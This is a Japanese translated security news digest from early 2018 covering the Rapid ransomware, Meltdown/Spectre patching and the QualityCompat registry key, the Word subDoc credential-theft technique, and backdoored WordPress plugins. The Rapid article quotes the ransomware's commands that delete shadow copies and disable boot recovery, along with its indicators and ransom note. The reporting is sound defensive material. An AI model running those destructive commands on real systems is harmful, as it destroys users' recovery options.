     残念ながら、Windows 7 SP1, 8, 8.1, 10 でのみ利用可能である。
     このソフトウェアのダウンロードはこちら。登録は要求されない。


    Rapid身代金要求型マルウェアはユーザが作成した新しいファイルを暗号化し続けている
    BleepingComputer : News>Security (2018/01/23)
     最初にコンピュータを暗号化した後、アクティブなまま存在し、作成されたあらゆる新しいファイルを暗号化するRapidと呼ばれる新しい身代金要求型マルウェアが拡散中である。この挙動はRapid特有のものではないが、我々が頻繁に見る一般的な挙動ではない。
    Rapid身代金要求型マルウェアが拡散している方法は未知であるが、一月に始まり、多くの人々に感染し続けている。ID-Ransomwareの統計によると、統計上の最初発見は1月3日であり、これまでに300を超える登録になっている。この数は、多分全犠牲者の中の氷山の一角であり、十中八九この感染を特定するためのID-Ransomwareを活用していない多くの人々がいる。

    ID-RansomwareへのRapid身代金要求型マルウェア提出数

    Rapid身代金要求型マルウェアがコンピュータを暗号化する方法

     この身代金要求型マルウェアが実行されると、この身代金要求型マルウェアは、シャドーボリュームコピーを除去し、データベース プロセスを終了し、自動修復を無効化する。この終了させられるプロセスは、sql.exe, sqlite.exe, oracle.comであり、実行されるコマンドは以下である。

    vssadmin.exe Delete Shadow /All /Quiet
    cmd.exe /C bcdedit /set {default} recoveryenabled No
    cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures

     これらのコマンドが実行されたら、この身代金要求型マルウェアは、暗号化するためのファイルに関してコンピュータをスキャンする。ファイルが暗号化されると、その暗号化されたファイル名に .rapid 拡張子を追加する。

    暗号化されたフォルダ

     この身代金要求型マルウェアがコンピュータの暗号化を終了すると、Windowsデスクトップを含む様々なフォルダ中にHow Recovery Files.txtと名付けられた脅迫文を作成する。この脅迫文は、犠牲者が支払い指示を受け取るためにコンタクトしなければならないeMailを含んでいる。

    Rapid身代金要求型マルウェアの脅迫文

     この感染はまた、この身代金要求型マルウェアがスタートアップで起動するautorunsを作成し、脅迫文を表示する。これらautorunsに関する情報は以下のIOCsで発見することができる。
     現時点で、Rapid身代金要求型マルウェアは、無料で復号することはできないし、支払ったとしても攻撃者が復号キーを提供してくれるかどうか分かっていない。感染させられた人々に関して、我々は、犠牲者がこの感染を論議しサポートを受けることのできるRapid Ransomware Support & Helpトピックを立ち上げている。

    Rapid身代金要求型マルウェアに感染した場合に、あなたが実行すること

     Rapid身代金要求型マルウェアは、最初にコンピュータを暗号化した後も、実行を継続し、暗号化するための新しいファイルを監視し続けているので、可能な限り早急に、この身代金要求型マルウェアをシャットダウンすることは重要である。犠牲者がRapid身代金要求型マルウェアに感染させられたことを検出したら、即座にWindowsタスクマネージャを開き、この身代金要求型マルウェア関連プロセスを終了させなさい。
     そのコンピュータが未だ再起動させられていないのであれば、この実行プロセスは、何らかの名前を持っているかもしれない。例えば、我々のサンプルでは、rapid.exe と名付けられていた。そして、あなたは以下のスクリーンショットで、このプロセスを確認できる。実際の犠牲者は、稼働中にはこのファイル名を持っていない。そのコンピュータが既に再起動されているのであれば、この身代金要求型マルウェアのプロセスは、info.exe と名付けられているかもしれない。

    タスクマネージャ

     このプロセスを終了したら、msconfig.exeを起動し、このautorunsを無効にしなさい。あなたがWindowsタスクマネージャにアクセスできないのであれば、Safe Mode with Networking(セーフモードとネットワーク)でコンピュータを再起動し、そこからタスクマネージャにアクセスすることを試みなさい。

    Rapid身代金要求型マルウェアから自分自身を保護するには

     身代金要求型マルウェアから自分自身を保護するためには、適切なコンピュータ利用の習慣とセキュリティソフトウェアを使用することが重要である。真っ先に、あなたは、身代金要求型マルウェア攻撃のような緊急の場合に、復元可能な信頼性がありテスト済みのデータのバックアップを常に持っておかなければならない。
     あなたはまた、身代金要求型マルウェアと戦うために、シグネチャ検出やヒューリスティックだけではなく、挙動検出を組み込んであるセキュリティソフトを持たなければならない。例えば、Emsisoft Anti-MalwareMalwarebytes Anti-Malwareは共に、殆どではないにしても、多くの身代金要求型マルウェア感染によるコンピュータの暗号化を防御できる挙動検出を含んでいる。
     大事なことを言い忘れていたが、必ず、以下のセキュリティ習慣を実行しなさい。これは多くの場合に、先ず行うべき最も重要なステップである。

      ・ バックアップ、バックアップ、バックアップ!
      ・ 見知らぬ人からの添付ファイルを開くな
      ・ その人が実際にそれらを送信したことを確認するまで添付ファイルを開くな
      ・ VirusTotalのようなツールで添付ファイルをスキャンしなさい
      ・ Windowsアップデートが出現したら直ぐに、必ずWindowsアップデートを全てインストールしなさい。また、必ず全てのプログラムをアップデートしなさい。特にJava, Flash, Adobe Reader。古いプログラムは、マルウェアの配布者によって一般的に攻撃可能なセキュリティ上の脆弱性を含んでいる。従って、それらをアップデートすることは重要である
      ・ 必ず、挙動検出やホワイトリスト テクノロジを使用している何らかのセキュリティソフトウェアをインストールして使用するようにしなさい。ホワイトリスト化は、訓練という苦痛を伴うが、それを蓄えていく意思があるのなら、最大の見返りとなるだろう
      ・ 難解なパスワードを使用しなさい。そして、決して複数のサイトで同じパスワードを再利用しないようにしなさい

     身代金要求型マルウェアを防御するための完全ガイドに関しては、我々のHow to Protect and Harden a Computer against Ransomwareを参照しなさい。

    IOCs

    ハッシュ

    125c2bcb0cd05512391a695f907669b2f55a8b69c9d4df2ce1b6c9c5a1395b61

    Rapid身代金要求型マルウェア関連ファイル

    %AppData%\info.exe
    %AppData%\How Recovery Files.txt
    %AppData%\recovery.txt

    Rapid身代金要求型マルウェア関連レジストリエントリ

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Encrypter"="%AppData%\info.exe"
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "userinfo"="%AppData%\recovery.txt"

    Rapid身代金要求型マルウェアeMailアドレス

    frenkmoddy@tuta.io
    jpcrypt@rape.lol
    support@fbamasters.com
    unlockforyou@india.com
    rapid@rape.lol
    fileskey@qq.com
    fileskey@cock.li

    Rapid身代金要求型マルウェア脅迫文

    Hello!
    All your files have been encrypted by us
    If you want restore files write on e-mail - frenkmoddy@tuta.io


    MeltdownとSpectreのパッチはインストールするな。Intelはシステム再起動を増加させるだろうと警告している
    Fossbytes : Security (2018/01/23)
     今月初旬、Intelは、数日中に5年前のマシンの凡そ90%を修正するだろうと約束した。しかし、このパッチ自体は、ユーザのコンピュータに再起動の問題を残したままにすることで問題を増加させた。
     現在、Intelは、新しい投稿でこの問題に取り組んでおり、彼らが何らかの解決策を見つけ出すまで、MeltdownとSpectreバグ用に現在利用可能になっているセキュリティパッチをインストールしないようにユーザにアドバイスしている。
     「我々は、OEM、クラウドサービス プロバイダ、システム製造業者、ソフトウェア企業、エンドユーザが、現在のバージョンの配備を中止することを推奨する。これは、予期していた以上の再起動と他の想定外のシステム挙動を導くかもしれないからである」と、Intelの執行役員副社長Navin Shenoyは警告している。
     Shenoyはまた、彼らがBroadwellとHaswellに関するルート問題を発見したと発言している。彼らは、修正の早期バージョンを彼らのOEMパートナーとこの週末にかけてテストし、セキュリティフィックスの最終バージョンをリリースすることになる。彼らはまた、Ivy Bridge, Sandy Bridge, Skylake, Kaby Lakeアーキテクチャに基づく他の影響を受けるチップに関してもセキュリティパッチを作業中である。MeltdownとSpectreパッチはIntel用には問題を発生しない。
     数日前、Microsoftは、AMDベース システムを搭載するユーザのマシンでブートできない問題た発生した後、AMDベース システム用のパッチを停止しなければならなかった。Canonicalが今月、Ubuntu Linux用の修正をリリースした時、似たようなことが発生した。


    Microsoftは、あなたのアンチウィルスがレジストリキーを設定しない限り、もはやWindowsセキュリティアップデートは受け取ることができないと発言している
    BleepingComputer : News>Security (2018/01/09)
     Microsoftは、アンチウィルス製品と最近のWindows MeltdownとSpectreパッチとの間での互換性がないことを説明しているサポートページ上に新たに大変重要な詳細を追加した。
     今週追加された更新情報によると、Microsoftは、Windowsユーザが利用しているアンチウィルス プログラムがWindows MeltdownとSpectreパッチと互換しない限り、2018年1月の定例のセキュリティアップデートや、その後の如何なる定例のパッチも受け取ることはないだろうと発言している。
     アンチウィルス プログラムが互換性を持つための方法は、彼らの製品をアップデートし、Windowsレジストリに特別なレジストリキーを追加することである。
     このレジストリキーの存在が、Windows OSに、アンチウィルス製品が互換していることを告げ、最先端のCPU 中の緊急のフローを解決するためのMeltdownとSpectreパッチをインストールするWindowsアップデートの引き金になる。

    レジストリキーは、ユーザが将来のアップデートに関して適格であるか否かを決定する

     Microsoftの最新のポリシーの変更によると、このレジストリキーは、Windowsアップデートプロセスの永久的なチェックになっており、(【訳者追加】 このレジストキーが設定されていないのであれば)MeltdownとSpectreパッチだけでなく、将来の全てのアップデートを妨げるだろう。
     Microsoftは、テスト中に一部のアンチウィルス製品が、その後のブートアップを妨げるBlue Screen of Death(BSOD)エラーをWindowsコンピュータに発生させることを検出したために、アンチウィルス企業に、このレジストリキーを作成するよう要請している。
     セキュリティ研究者Kevin Beaumontは、本日早く、Mediumブログ ポストでこれが発生した理由を説明している。

     アンチウィルス ベンダの一部は、システムコールを妨害するために使用するハイパーバイザー(【訳注】 コンピュータの仮想化技術のひとつである仮想機械(バーチャルマシン)を実現するための制御プログラム(Weblioより))を挿入することでKernel Patch Protection(カーネル・パッチ・プロテクション。【訳注】 Microsoft Windowsの64ビット版が持つ、カーネルへのパッチの適用を妨ぐ機構で、一般にはPatch Guard (パッチ・ガード)の名称で知られる(Wikipediaより))をバイパスするテクニックを使用し、メモリロケーション(Meltdownの修正で現在変化しているメモリロケーション)に関して憶測を立ていることに問題がある。率直に言うと、このテクニックの一部は、ルートキットで使用されているテクニックと類似のものである。事実、Kernel Patch Protectionは、ルートキットと戦うために10年前にMicrosoftによって導入された。一部のアンチウィルス ベンダが大変疑問の余地のあるテクニックを使用しているために、彼らは結局システムに‘blue screen of death’(言い換えるなら、再起動ループ)を発生させることになる。

     MeltdownとSpectre脆弱性は、最先端のプロセッサ設計中の基本的なフローを目立たせた。Microsoftが先週配備した修正は、アンチウィルス ソフトが現在Windows OSと相互作用している方法に関して類似の影響を生成している。
     アンチウィルスを使用していないWindowsユーザ、あるいは、Windows Defenderを使用しているWindows ユーザは、彼らがレジストリキーの要求に服従しなくていいので、今すぐアップデートする必要がある。唯一影響を受ける人々は、カスタム(サードパーティ製アンチウィルス)を使用している人々である。
     大多数のアンチウィルス ベンダは、MeltdownとSpectreパッチをサポートするように彼らの製品をアップデートしたが、ベンダの一部は、ユーザにレジストリキーを手動で設定するように要求している。
     Beaumontによると、アンチウィルス企業は、彼らの顧客の一部が他の企業のアンチウィルスソフトウェアと一緒に稼働していることを承知しているために、これが発生しているとしている。このために、彼らは、他のアンチウィルスがMeltdownとSpectreパッチ用にアップデートされていない間に、レジストリキーを設定することで偶然にBSODを発生させる事を望んでいない。
     言い換えれば、シッチャカメッチャカである。

    レジストリキーは、そのうちに問題を引き起こすかもしれない

     Beaumontは、このレジストリキーを作成しているアンチウィルス製品、ユーザに手動でこのレジストリキーを作成するように要請しているアンチウィルス製品、未だアップデートしておらず、Windows MeltdownとSpectreパッチと現在非互換であるアンチウィルス・ソフトウェアを追跡し続けてきた
     Bleeping Computerは、Windowsユーザーベースの大半は多分この「レジストリキーの要求」によって影響を受けないと信じている。
     でも、今後数ヶ月、ユーザがセキュリティアップデートを受け取っていないことに気が付いたなら、彼らが最初に注目すべきは、アンチウィルスである。
     ユーザはまた、Beaumontのリストを閲覧し、念の為に彼らの現在のアンチウィルスが、MeltdownとSpectreパッチと互換していることを確かめるべきである。

    ユーザはアンチウィルスにもう少し時間を与えるべき

     アンチウィルス製品やユーザがレジストリキーを設定するまで全てのWindowsセキュリティアップデートを停止することに関しては、Microsoftは基本的に2つのことを発言している。
     (1) ユーザは、現在のアンチウィルスのままで、Windowsセキュリティアップデートの受信を停止するか、
     (2) 彼らの現在非互換のアンチウィルスを放棄し、MeltdownとSpectreのための重大な修正をサポートするアンチウィルスにする。
    かの何れかであると発言している。
     ユーザは、今直ぐに現在のアンチウィルスを見捨てることを急ぐべきではない。先週のステートメントで、Microsoftは、アンチウィルス企業がアップデートをリリースするまでに少し時間がかかるかもしれないとと発言し、辛抱するようにユーザにアドバイスしている。このアップデートは大変複雑であり、一般的なソースコードの一行の修正ではない。
     アンチウィルス製品が設定する必要のあるレジストリキーは以下である。

    Key="HKEY_LOCAL_MACHINE" Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" Value="cadca5fe-87d3-4b96-b7fb-a231484277cc" Type="REG_DWORD”

     Bleeping Computerは、ユーザがダブルクリックすることで、そのPCにこのレジストリキーを作成する .reg ファイルを作成した。ユーザは、彼らのアンチウィルス ベンダが、このレジストリキーを手動でインストールするようにユーザに告げているのであれば、ユーザは、このファイルを使用することができる。WindowsコンピュータをMeltdownとSpectreパッチでアップデートする詳細情報は、ここで得られる。


    Microsoft WordのsubDoc機能は、Windows認証を盗むために悪用されている
    BleepingComputer : News>Security (2018/01/05)
     アメリカに本拠を置くサイバーセキュリティ企業Rhino Labsのセキュリティ研究チームは、悪意ある者達がsubDocと呼ばれるあまり知られていないMicrosoft Wordの機能を使用して、NTLMハッシュ(ユーザアカウント認証を格納している標準フォーマット)を渡すことでWindowsコンピュータを欺くことができることを発見した。
     このテクニックの核心は、数年間知られている古典的なNTLM pass-the-hash攻撃(【訳注】 攻撃者がパスワードを利用して認証するのではなく、パスワードのハッシュ値を利用して認証を突破する攻撃の事(図解サイバーセキュリティ用語より))である。Rhino Labsによると、違っていることは、Wordファイルを「マスタードキュメントからサブドキュメントにロードする」ことを可能にするsubDocと呼ばれるWordの機能を介して、これが実行されることにある。

    subDoc攻撃の動作方法

     Rhino Labsのエキスパートは、攻撃者は悪意あるサーバからサブドキュメントを読み込み、Wordファイルを組み立てることができると発言している。
     攻撃者は、このリクエストのもう一つの末端に悪意あるSMBサーバをホストすることができ、要求されるサブドキュメントを提供する代わりに、インチキのドメインの認証に必要とされるNTLMハッシュを渡すことで犠牲者のPCを欺いている。
     NTLMハッシュをクラックし、Windows認証を取得するためにオンラインで利用可能な多くのツールが存在している。攻撃者は次に、これらのログインを使用して、オリジナルのユーザを装い、犠牲者のコンピュータやネットワークにアクセスすることができる。この種のハッキングは、高い価値をもつターゲット(企業や政府機関)を目標とするスピアフィッシング キャンペーンに理想的である。

    subDocは、DDE、数式エディタ等に仲間入りした

     この攻撃は、セキュリティ研究者Juan Diegoやセイバーセキュリティ企業DefenceCodeによって説明されているように、NTFSハッシュを渡してWindowsを欺くためにSCFファイルやSMBリクエストを使用するような他のテクニックに多少類似している。
     これはまた、あまり知られていないMicrosoft Word機能を悪用した最初の攻撃方法ではない。他のテクニックは、Microsoft Dynamic Data Exchange機能(DDE、【訳注】 動的データ交換。WindowsやOS/2環境下において、複数のアプリケーションソフトウェア間で通信を行う技術(Wikipediaより))や、古いOffice数式エディタの使用を含んでいる。
     現在subDoc攻撃の検出には問題がある。
     「この機能は悪意ある行動のための攻撃ベクトルとして公に認識されていないので、アンチウィルスソフトウェアによって認識されない」と、VirusTotal上のアンチウィルスエンジンの全てが、subDocメソッドを介して兵器化したWordドキュメントを検出しなかった事を強調して、Rhino Labsは発言している。
     Microsoftは、マルウェア配布者からの繰り返される悪用に起因して、最近Word中のDDEサポートを無効化した。subDocの運命は、この機能が通常のマルウエアの配布キャンペーンに役に立っていないことと、DDE攻撃されているMicrosoftが注目していないことから不明である。
     Rhino Labsはまた、subDocで兵器化したWordファイルを生成するためのツールをリリースしているので、システム管理者やセキュリティ研究者は、独自のテストを実行することができる。このツールは、SubDoc Injectorと名付けられており、GitHubで利用可能である、そして、現在Rhino Labsの一部門であり以前のLulzSecのメンバー、Hector "Sabu" Monsegur(【訳注】 ヘクター・ザビエル・モンセガー。アメリカ人のハッカー、通称「Sabu」。アノニマスAnonOpsグループ出身のハッカーで、アノニマスから分裂したLulzSec(ライズセック)のリーダーと目される(Wikipediaより))によって生み出された。Rhono Labsはまた、subDoc攻撃のステップ・バイ・ステップでの再現性付きの技術投稿を公開した。


    MeltdownとSpectre CPUフローに関してWindowsシステムをチェックしアップデートする方法
    BleepingComputer : News>Security (2018/01/04)
     我々が以前記事を公開し、MicrosoftがMeltdownとSpectre CPUフローを解決する定例外のWindowsアップデートをした今日まで、我々は、これらのパッチをインストールする際の説明とサポートに関するノンストップの要請を受けてきた。
     社説形式の記事は、おそらくアドバイスを与える最善のフォーマットではないだろう。そこで、我々は、これらのアップデートを取得する方法と、Microsoftのあまりにも複雑なアナウンスを舵取りする方法に関して、単純、極めて易しく、一歩々々の記事にするつもりである。
     我々が、この情報を収集するために使用した4つのMicrosfotヘルプページがある。そして、これらのページをあなたは読みたいかもしれない。念の為に:(リンクは日本語サイトに変更していますが、一部英文のままのページもあります)

     これら全てのページでの最も主要で重要な声明は以下である。

     非互換のアンチウィルス アプリケーションによって発生するストップ・エラーを防止するために、Microsoftは、彼らのソフトウェアが、2018年01月のWindowsオペレーティング・システムのセキュリティアップデートと互換していることが確認されているメーカーのアンチウィルス ソフトを実行しているデバイスのためにだけ、Windowsセキュリティ アップデート(2018年01月03日にリリース)を提供している。

    これは何を意味しているのか?

     あなたのWindowsオペレーティング・システムのWindows Updateセクションに進み、「更新プログラムの確認」を押した時に、何かが現れた場合には、あなたは、それをインストールしても安全であることを意味している。
     Windowsアップデート パッケージ(KB番号)は、ここで利用可能である。あなたのオペレーティングシステムとハードウェア プラットフォームに応じて様々なKB番号が表示されるだろう。
     何も現れなかった場合は、Windowsが、あなたのシステム上に非互換のアンチウィルスソフトの存在を検出したことを意味している。

    アンチウィルス プログラムでの全体的混乱

     Microsoftは、テストしている間に、MeltdownとSpectreパッチのインストレーション後、コンピュータのブートを妨げBSOD(死のブルースクリーン)を発生させるアンチウィルス プログラムを幾つか検出したと発言している。
     Microsoftは、アンチウィルス ベンダに、彼らの製品を修正し、製品を確認したりアップデートしたりした時に、顧客のコンピュータ上にレジストリキーを作成するように指示したと、そうしなければ、Meltdown/Spectreアップデート後にWindows PCはクラッシュすると発言している。
     Microsoftは現在、ユーザがWindowsをアップデートする時は常に、アップデートシステムがユーザのPCのそのレジストリキーをチェックするだろうと発言している。
     このキーが存在している場合、Windowsアップデートプロセスは、そのアンチウィルスソフトがMeltdownとSpectreパッチをサポートするためのアップデートを受け取っていると確信し、適切なOSアップデートをインストールするだろう。
     これは事態を厄介にしている。一部のアンチウィルス企業は、レジストリキーを作成する計画はないと発言し、一部は、このキーの作成は技術的にできないと発言している。それ以外の企業は後日アップデートを出荷するだろう。  このGoogleドキュメントファイルは幾つかのアンチウィルス企業の対応リストを含んでいる。
     簡潔に言えば、殆どのアンチウィルス企業は製品のアップデートとレジストリキーの自動的な追加を約束しているので、殆どすべてのユーザは待つことになる。
     これに取り組む最も簡単な方法は、あなたが毎日Windows Updateセクションに行き、「更新プログラムの確認」ボタンを押すしかない、そして、あなたのアンチウィルス製品が、そのレジストリキーを作成した後、そのアップデートを受け取るだろう。
     あなたのアンチウィルス企業が、そのレジストリキーの追加を計画していない不幸な人の一人であるのなら、これが、あなたに代わって以下のレジストリキーを自動的に作成するためにBleeping Computerが作成した .reg ファイルである。

    Key="HKEY_LOCAL_MACHINE" Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" Value="cadca5fe-87d3-4b96-b7fb-a231484277cc" Type="REG_DWORD”

    我々は、これを目立たせるために赤字で表示する。あなたのアンチウィルス ベンダがMeltdownとSpectreパッチと互換するAVベンダである事を確認した場合にのみ、この .reg ファイルを実行しなさい。

     あなたが、このファイルを実行したり、このレジストリキーを手動で追加すると、あなたのPCは、MeltdownとSpectre用のパッチを受け取るだろう。

    パッチの状態をチェックする方法

     Microsoftはまた、あなたのPCにこのアップデートが適切にインストールされているか否かをチェックする、あるいは、追加のファームウェアアップデートをあなたが必要としているか否かをチェックするために使用することのできる一連のPowerShellワンライナー(気の利いた寸評)をリリースしている。

     PowerShellを起動する時、必ず管理者権限で起動しなさい、そこで、要求されるモジュールをインストールすることができる。

     以下のPoserShellコマンドは、MeltdownとSpectreフローをテストするためのPoserShellモジュールをダウンロードしインストールする。

    Install-Module SpeculationControl

     あなたが、このコマンドを実行し実行エラーを得た場合、あなたのPowerShell実行ポリシーを調整する必要があるかもしれない。以下のコマンドを実行しなさい。

    Set-ExecutionPolicy Bypass

     これで、あなたのシステムを実際にチェックする二つ目のPowerShellコマンドを実行できる。

    Get-SpeculationControlSettings

     Googleは、全てのCPUがMeltdownとSpectreフローに対する脆弱性があるわけではないが、その結果が、沢山の赤字で表示したように見えたなら、あなたのCPUとOSは、これらの攻撃に対して脆弱性がある。十中八九、このコマンドの結果は、以下のようになると、発言している。


    パッチ前(画像をクリックすると拡大します)

     次のステップは、あなたがMeltdown/Spectreパッチを受け取るまで「更新プログラムの確認」ボタンを押すことである。上述の説明のように、これは、「問題のある」アンチウィルス ソフトウェアを使用している一部ユーザに関しては数日かかるかもしれない。


    MeltdownとSpectreパッチに関するWindows Update(画像をクリックすると拡大します)

     このアップデートの後、もう一度 Get-SpeculationControlSettings コマンドを実行する必要がある。可能なシナリオが二つある。
     最も一般的なシナリオは以下の結果になる。


    パッチした後、更にファームウェアのアップデートが必要とされる(画像をクリックすると拡大します)

     この画像は、あなたのシステムがMeltdownバグ用のパッチを受け取ったが、Spectreバグに関しては不完全なパッチを受け取ったことを意味している。  GoogleがSpectreは脆弱性攻撃することも難かしいがパッチすることも難かしいと昨日発言したように、これは予期されていたことである。
     赤字のテキストが意味していることは、あなたが追加のチップセット ファームウェア アップデートを必要としていることである。MicrosoftとGoogleは、OEMは、Windows OSレベルのSpectreパッチを完成するために、これらの追加ファームウェア アップデートをユーザに提供する必要があると発言している。あなたのコンピュータの年代に応じて、一部のOEMは、これらのファームウェア アップデートを利用可能にしないかもしれない。これは、あなたが不完全なSpectreパッチのまま固定されることを意味している。
     あなたのラップトップ/デスクトップ/サーバ ベンダが臨時のファームウェアアップデートを提供しているのであれば、その公式サイトからアップデートを取得し、インストールすることで、パッチを完了することができる。
     全てが上手く行っているのであれば、全てのチェックは、緑色に色付けられたテキストで表示されるだろう。以下のように。


    MeltdownとSpectreパッチが達成されている場合(画像をクリックすると拡大します)

     上図のように、出力が全て緑であり、各アイテムがTrueに設定されているなら、あなたは、これらの攻撃から保護されている。


    MicrosoftがMeltdownとSpectre CPUフローの緊急アップデートをリリースした
    BleepingComputer : News>Security (2018/01/04)
     昨晩遅く、Microsoftは、MeltdownとSpectre(1995年以降にリリースされた殆どすべてのCPUに影響を与えると言われている二つのセキュリティフロー)を解決する定例外のアップデートをリリースした。
     Microsoftは、来週の月例アップデートまでこのアップデートをリリースする計画はなかったが、Googleがこの二つの脆弱性に関する詳細を公開したので、修正をリリースすることを強いられた。
     Microsoftのセキュリティアドバイザリ(リンクは日本語サイトに変更しています)によると、これらはMeltdownとSpectreフローを解決する様々なWindowsディストリビューション用のWindowsセキュリティ アップデートである。

    【訳注】 以下の表中のリンクはMicrosoftの日本語サイトに変更していますが、現時点(2018/01/04 22:20)で英文のままです。

                      
    オペレーティング・システムのバージョン アップデート KB
    Windows Server, version 1709 (Server Core Installation) 4656892
    Windows Server 2016 4056890
    Windows Server 2012 R2 4056898
    Windows Server 2012 適用外
    Windows Server 2008 R2 4056897
    Windows Server 2008 適用外

     このMicrosoftアップデートは全面的な修正ではない。Windows PCの一部は、Spectre攻撃を緩和するための追加のCPUファームウェア アップデートを要求するかもしれないが、このMicrosoftアップデートは、Meltdownフローを完全に解決すると思われる。

    アンチウィルスソフトの一部での問題は、BSOD(死のブルースクリーン)に導くかもしれない

     しかし、Microsoftはまた、MeltdownとSpectreセキュリティフィックスが、アンチウィルス製品の一部とは互換しないと警告している。
     「我々のテストプロセスの間、我々はサードパーティ アプリケーションの一部が、Windowsカーネルメモリにサポートされていないコールを実行し、ストップ・エラー(BSODとして知られる)を発生する事が明らかになった」と、Microsoftは、昨日のセキュリティフィックスに関する互換ノートで発言している。
     「これらのコールは、このデバイスがブートすることを不可能にする(中略)ストップ・エラーを発生するかもしれない。非互換のアンチウィルス アプリケーションによって発生するストップ・エラーを防止するために、Microsoftは、彼らのソフトウェアが、2018年01月のWindowsオペレーティング・システムのセキュリティアップデートと互換していることが確認されているメーカーのアンチウィルス ソフトを実行しているデバイスのためにだけ、2018年01月03日にリリースしたWindowsセキュリティ アップデートを提供している。」
     「あなたが、このセキュリティアップデートを提供されていないのであれば、あなたは非互換のアンチウィルスソフトを稼働している可能性がある。そして、あなたは、そのソフトウェアのベンダをフォローしなければならない」と、Microsoftは発言している。
     また、現実世界において、MeltdownもしくはSpectre攻撃を使用している悪意あるグループの報告はないので、Microsoftは、ユーザが、アンチウィルス ベンダに彼らの製品をアップデートするためのより多くの時間を与えることを推奨している。
     アンチウィルス ベンダがMeltdownとSpectreパッチをサポートするために彼らの製品をアップデートした時、彼らは、OS上にカスタム レジストリキーを作成するように指示されており、これは、Windowsが適切なセキュリティフィックスをダウンロードし受け取ることを可能にするだろうと、Microsoftは発言している(ユーザもそれに同意した場合)。
     他のベンダもまた、パッチを発行している。あなたは、ここで完全なリストを発見することができる。


    数百のサイトが、バックドア化されたWordPressプラグインを3年経っても使っている
    BleepingComputer : News>Security (2017/12/26)
     14のWordPressプラグインのソースコードの内部に意図的な悪意あるコードの存在が明らかになって数年、専門家は、数百のサイトがブービートラップされたコンポーネントを依然として使用していると警告している。
     2016年10月下旬、White Fir Designのセキュリティ研究者達は、攻撃者にWordPressサイト上でリモートコードの実行を可能にする14のプラグイン内部の奇妙なコードの存在について公に警告した。
     「このコードは、正当な目的を持っているようには見えず、おそらく、意図的に悪意を持たせたものであることを示していた」と、専門家は発言している。

    悪意あるプラグインは2014年にWordPressサイトから削除された

    White Firは、この14のプラグインと、同じ悪意あるコードを発見したThomas Hambach(香港に居住するWeb開発者)の2014年のブログポストを関連付けた。
     Hambachは、ハイジャックされたサイトにSEOスパムリンク(【訳注】 SEOは、検索エンジン最適化のこと。裏技を使って検索順位をあげようとする行為がSEOスパム)を挿入するために悪意あるコードを使用し、このサイトのURLや、その他の詳細を攻撃者にeMailしていた。
     WordPressチームは、Hambachの発見に続いて介入し、2014年2月までに彼が発見したプラグインを削除した。そして、2014年後半までに、WordPressは、公式のWordPressプラグイン・ディレクトリから14の悪意あるプラグイン全てを削除した。
     WordPressチームのアクションの後も、WordPressは、2015年中、バックドア化されたプラグインに特有の悪意あるコードにアクセスしようとしている様々なIPアドレスからのリクエストを検出し続けていた

    数百のWordPressサイトはバックドア化されたプラグインを使用し続けていた

     これらの過去の攻撃は、最近になって再び脚光を浴びた。WordPressプラグイン・ディレクトリは、ダウンロード オプションが無効にされていたとはいえ、閉じられた古いプラグインのページは可視のまま存在するように変更されていた。いままで、これらのページは公にはアクセスできなかった。
     故意に悪意あるコードを特徴とした以前の全てのプラグインのページは、WordPressチームがパブリックダウンロードから、これらのプラグインを削除してほぼ3年経ってさえ、それらを使用している数百のサイトが存在していることを示している。


    バックドア化されたコードを特徴にしていた14のプラグインの一つ

                                                    
    プラグイン名 アクティブ インストール
    return-to-top 50以上
    page-google-maps 500以上
    gallery-slider 300以上
    g-translate 60以上
    share-buttons-wp 200以上
    mailchimp-integration 10未満
    smart-videos 70以上
    seo-rotator-for-images 70以上
    ads-widget 40以上
    seo-keyword-page 200以上
    wp-handy-lightbox 500以上
    wp-popup 10未満
    google-analytics-analyze 70以上
    cookie-eu 10未満

     これらのプラグインを使用しているサイトの全てが、何を探すべきかを認識しているあらゆるハッカーによってハッキングされる可能性がある。これらのサイトは十中八九見捨てられ、長く忘れられたプロジェクトである。これはWeb最大の問題の一つであり、"Website rot"(【訳注】 ROTは、Redundant(冗長), Outdated(期限切れ), Trivial(些末)コンテンツの頭文字(TechRepublicより))としても知られる。

    WordPressは意のままに使えるオプションを制限した

     マルウェアの配布などに乱用される可能性のある簡単にハッキングできるサイトからユーザを保護するために、一部の専門家は、セキュリティ上の理由から、プラグインが公式のWordPressプラグイン・ディレクトリから削除された時に、WordPressチームがサイトの所有者に警告することを提案している。
    WordPressのスタッフ達は、これはWordPressのサイトに多大なリスクをもたらすと発言し、このアイデアを即座に拒否した。
     「脆弱性悪用プログラムが存在し、我々がパッチ無しにその事実を公開したなら、我々はよりリスクを負うことになる」と、「我々が脆弱性があることを知らせたなら、(殆どの)ハッカーは全員を攻撃する。我々が誰にも告げなければ、認識しているハッカーが攻撃することになるだろうが、いずれにせよ、彼らは攻撃するだろう」と、WordPressチームのメンバーMika Epsteinは発言している
     しかし、専門家たちは、この解決策に納得しておらず、一部の人は、WordPressスタッフ達が、影響を受けるサイトから脆弱性のあるプラグインを削除するための押し付けがましいステップを採るべきであると主張している。
     この提案での問題は、ハッカーからサイトをセーフガードすることと、プラグインと間接的な幾つかの機能を削除することによって一部のWebサイトの機能を破壊するというモラルと法とのジレンマを作成したことである。
     このような議論の後一年経って、WordPressチームは、30万を超えるサイトに影響を与えた他のバックドア化されたWordPressプラグインのケースを公開したので、WordPressチームは、別の道を選択したように見える。
     差し当たり、一部のメジャーなセキュリティ脅威を撃退するために、WordPress開発者は、悪意あるプラグイン変更を同一のプラグインの最新のクリーンなバージョンに戻すかのようである。そして、WordPressチームは、新しいアップデートとしてパックし、影響を受ける全てのサイトにそれを強制インストールするだろう。この方法で、あらゆるメジャーな脆弱性もしくはバックドアは削除されるが、サイトの機能は、そのまま保たれる。この行動方針は、WordPressチームから貴重な時間を奪い、メジャーなセキュリティ問題だけを配備することになる。
     一方、サイト所有者は、WordPressプラグイン・ディレクトリで利用可能な多くのセキュリティプラグインの一つをインストールできる。そして、セキュリティフローを特徴とする古いプラグインに関して彼らのサイトを監査することができる。


    Huawei(ファーウェイ)のルータ脆弱性は、Miraiの変種を拡散するために使用されている
    Kaspersky : ThreatPost (2017/12/22)
